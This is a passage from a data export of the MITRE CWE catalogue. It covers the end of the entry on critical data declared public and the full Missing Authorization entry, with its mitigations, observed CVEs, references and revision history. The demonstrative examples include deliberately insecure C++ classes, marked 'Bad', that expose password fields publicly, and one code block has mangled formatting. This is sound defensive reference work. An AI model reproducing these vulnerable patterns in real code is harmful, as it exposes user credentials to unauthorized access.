"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2019-01-03",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Critical Variable Declared Public",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "732",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "1061",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
},
{
"Description": null,
"Ordinality": "Indirect"
}
] |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example declares a critical variable public, making it accessible to anyone with access to the object in which it is contained.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tpublic: char* password;\n```",
"IntroText": null,
"Language": "C++",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Instead, the critical data should be declared private.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tprivate: char* password;\n```",
"IntroText": null,
"Language": "C++",
"Nature": "Good",
"Reference": null
},
{
"BodyText": "Even though this example declares the password to be private, there are other possible issues with this implementation, such as the possibility of recovering the password from process memory (CWE-257).",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example shows a basic user account class that includes member variables for the username and password as well as a public constructor for the class and a public method to authorize access to the user account.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t#define MAX_PASSWORD_LENGTH 15\n\t#define MAX_USERNAME_LENGTH 15\n\tclass UserAccount\n\t{\n\t\t\tpublic:\n\t\t\t\t\tUserAccount(char *username, char *password)\n\t\t\t\t\t{\n\t\t\t\t\t\tif ((strlen(username) > MAX_USERNAME_LENGTH) ||\n\t\t\t\t\t\t(strlen(password) > MAX_PASSWORD_LENGTH)) {\n\t\t\t\t\t\t\tExitError(\"Invalid username or password\");\n\t\t\t\t\t\t}\n\t\t\t\t\t\tstrcpy(this->username, username);\n\t\t\t\t\t\tstrcpy(this->password, password);\n\t\t\t\t\t}\n\t\t\tint authorizeAccess(char *username, char *password)\n\t\t\t{\n\t\t\t\t\tif ((strlen(username) > MAX_USERNAME_LENGTH) ||\n\t\t\t\t\t(strlen(password) > MAX_PASSWORD_LENGTH)) {\n\t\t\t\t\t\tExitError(\"Invalid username or password\");\n\t\t\t\t\t}\n```\n// if the username and password in the input parameters are equal to* \n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t *// the username and password of this account class then authorize access* \n\t\t\t\t\tif (strcmp(this->username, username) ||\n\t\t\t\t\tstrcmp(this->password, password))\n\t\t\t\t\t```\n\t\t\t\t\t\treturn 0;\n```\n// otherwise do not authorize access* \n\t\t\t\t\telse\n\t\t\t\t\t```\n\t\t\t\t\t\treturn 1;\n\t\t\t}\n\t\t\tchar username[MAX_USERNAME_LENGTH+1];\n\t\t\tchar password[MAX_PASSWORD_LENGTH+1];\n\t};\n```",
"IntroText": null,
"Language": "C++",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "However, the member variables username and password are declared public and therefore will allow access and changes to the member variables to anyone with access to the object. These member variables should be declared private as shown below to prevent unauthorized access and changes.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tclass UserAccount\n\t{\n\tpublic:\n\t\t...\n\tprivate:\n\t\tchar username[MAX_USERNAME_LENGTH+1];\n\t\tchar password[MAX_PASSWORD_LENGTH+1];\n\t};\n```",
"IntroText": null,
"Language": "C++",
"Nature": "Good",
"Reference": null
}
],
"ID": "DX-212"
}
] | null | null | null | null | 3
|
[
[
"284",
"285",
"732",
"766"
],
[
"664",
"668",
"732",
"766"
],
[
"710",
"1061",
"766"
]
] |
[] |
862
|
Missing Authorization
|
Class
|
Simple
|
Incomplete
|
The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "Web Server",
"Prevalence": "Often",
"Type": "Technology"
},
{
"Class": null,
"Name": "Database Server",
"Prevalence": "Often",
"Type": "Technology"
}
] |
[
{
"Description": "\"AuthZ\" is typically used as an abbreviation of \"authorization\" within the web application security community. It is distinct from \"AuthN\" (or, sometimes, \"AuthC\") which is an abbreviation of \"authentication.\" The use of \"Auth\" as an abbreviation is discouraged, since it could be used for either authentication or authorization.",
"Term": "AuthZ"
}
] |
[
{
"Note": "\n\nOMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.\n\n\nAuthorization weaknesses may arise when a single-user application is ported to a multi-user environment.\n",
"Phase": "Architecture and Design"
},
{
"Note": "A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Read Files or Directories"
],
"Likelihood": null,
"Note": "An attacker could read sensitive data, either by reading the data directly from a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to read the data.",
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Modify Application Data",
"Modify Files or Directories"
],
"Likelihood": null,
"Note": "An attacker could modify sensitive data, either by writing the data directly to a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to write the data.",
"Scope": [
"Integrity"
]
},
{
"Impact": [
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": "An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality.",
"Scope": [
"Access Control"
]
},
{
"Impact": [
"DoS: Crash, Exit, or Restart",
"DoS: Resource Consumption (CPU)",
"DoS: Resource Consumption (Memory)",
"DoS: Resource Consumption (Other)"
],
"Likelihood": null,
"Note": "An attacker could gain unauthorized access to resources on the system and excessively consume those resources, leading to a denial of service.",
"Scope": [
"Availability"
]
}
] |
[
{
"Description": "\n\nDivide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.\n\n\nNote that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "\n\nUse a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.\n\n\nFor example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-4.4",
"Phase": [
"Architecture and Design"
],
"Strategy": "Libraries or Frameworks"
},
{
"Description": "\n\nFor web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.\n\n\nOne way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \"default deny\" policy when defining these ACLs.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"System Configuration",
"Installation"
],
"Strategy": null
}
] |
[
{
"Description": "Go-based continuous deployment product does not check that a user has certain privileges to update or create an app, allowing adversaries to read sensitive repository information",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-24730",
"Reference": "CVE-2022-24730"
},
{
"Description": "Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3168",
"Reference": "CVE-2009-3168"
},
{
"Description": "Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3597",
"Reference": "CVE-2009-3597"
},
{
"Description": "Terminal server does not check authorization for guest access.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2282",
"Reference": "CVE-2009-2282"
},
{
"Description": "System monitoring software allows users to bypass authorization by creating custom forms.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-5027",
"Reference": "CVE-2008-5027"
},
{
"Description": "Content management system does not check access permissions for private files, allowing others to view those files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3781",
"Reference": "CVE-2009-3781"
},
{
"Description": "Product does not check the ACL of a page accessed using an \"include\" directive, allowing attackers to read unauthorized files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-6548",
"Reference": "CVE-2008-6548"
},
{
"Description": "Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2960",
"Reference": "CVE-2009-2960"
},
{
"Description": "Database server does not use appropriate privileges for certain sensitive operations.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-3230",
"Reference": "CVE-2009-3230"
},
{
"Description": "Gateway uses default \"Allow\" configuration for its authorization settings.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-2213",
"Reference": "CVE-2009-2213"
},
{
"Description": "Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-0034",
"Reference": "CVE-2009-0034"
},
{
"Description": "Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-6123",
"Reference": "CVE-2008-6123"
},
{
"Description": "Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-7109",
"Reference": "CVE-2008-7109"
},
{
"Description": "Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-3424",
"Reference": "CVE-2008-3424"
},
{
"Description": "Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1036",
"Reference": "CVE-2005-1036"
},
{
"Description": "ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-4577",
"Reference": "CVE-2008-4577"
},
{
"Description": "Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-2925",
"Reference": "CVE-2007-2925"
},
{
"Description": "Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2006-6679",
"Reference": "CVE-2006-6679"
},
{
"Description": "OS kernel does not check for a certain privilege before setting ACLs for files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-3623",
"Reference": "CVE-2005-3623"
},
{
"Description": "Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2801",
"Reference": "CVE-2005-2801"
},
{
"Description": "Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1155",
"Reference": "CVE-2001-1155"
},
{
"Description": "Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass (CWE-862)",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-17533",
"Reference": "CVE-2020-17533"
}
] | null |
[
{
"EntryID": "Part 2-1",
"EntryName": "Req 4.3.3.7",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 2.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CR 2.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
}
] |
[
"665"
] |
[
{
"Authors": [
"NIST"
],
"Edition": null,
"ExternalReferenceID": "REF-229",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Role Based Access Control and Role Based Security",
"URL": "https://csrc.nist.gov/projects/role-based-access-control",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Michael Howard",
"David LeBlanc"
],
"Edition": "2nd Edition",
"ExternalReferenceID": "REF-7",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "12",
"PublicationYear": "2002",
"Publisher": "Microsoft Press",
"Section": "Chapter 4, \"Authorization\" Page 114; Chapter 6, \"Determining\n Appropriate Access Control\" Page 171",
"Title": "Writing Secure Code",
"URL": "https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223",
"URLDate": null
},
{
"Authors": [
"Frank Kim"
],
"Edition": null,
"ExternalReferenceID": "REF-231",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "03",
"PublicationYear": "2010",
"Publisher": "SANS Software Security Institute",
"Section": null,
"Title": "Top 25 Series - Rank 5 - Improper Access Control (Authorization)",
"URL": "https://www.sans.org/blog/top-25-series-rank-5-improper-access-control-authorization/",
"URLDate": "2023-04-07"
},
{
"Authors": [
"OWASP"
],
"Edition": null,
"ExternalReferenceID": "REF-45",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "OWASP Enterprise Security API (ESAPI) Project",
"URL": "http://www.owasp.org/index.php/ESAPI",
"URLDate": null
},
{
"Authors": [
"Rahul Bhattacharjee"
],
"Edition": null,
"ExternalReferenceID": "REF-233",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Authentication using JAAS",
"URL": "https://javaranch.com/journal/2008/04/authentication-using-JAAS.html",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 2, \"Common Vulnerabilities of Authorization\", Page 39",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
}
] |
[
{
"Note": "Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource.",
"Type": "Terminology"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2011-05-24",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2011-06-01",
"SubmissionVersion": "1.13",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Related_Attack_Patterns, Relationships",
"ModificationDate": "2011-06-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, References, Relationships",
"ModificationDate": "2011-09-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Observed_Examples, References, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-02-18",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2017-01-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Observed_Examples",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples, Related_Attack_Patterns, Relationships",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
